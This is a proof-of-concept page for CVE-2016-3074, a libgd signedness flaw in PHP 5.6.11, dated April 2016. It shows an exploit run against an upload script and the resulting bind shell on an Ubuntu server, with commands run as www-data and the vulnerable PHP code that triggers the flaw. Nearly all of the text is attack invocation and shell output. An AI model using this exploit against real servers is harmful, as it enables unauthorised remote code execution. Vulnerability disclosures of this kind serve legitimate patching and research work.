CVE-2016-3074: php 5.6.11 + libgd: signedness vulnerability
Apr 22, 2016
PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and php5-fpm running behind nginx.
$ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
[*] this may take a while
[*] offset 912 of 10000...
[+] connected to 1.2.3.4:5555
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
dpkg -l|grep -E "php5-(fpm|gd)"
ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...
ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...
cat upload.php
<?php
imagecreatefromgd2($_FILES["file"]["tmp_name"]);
?>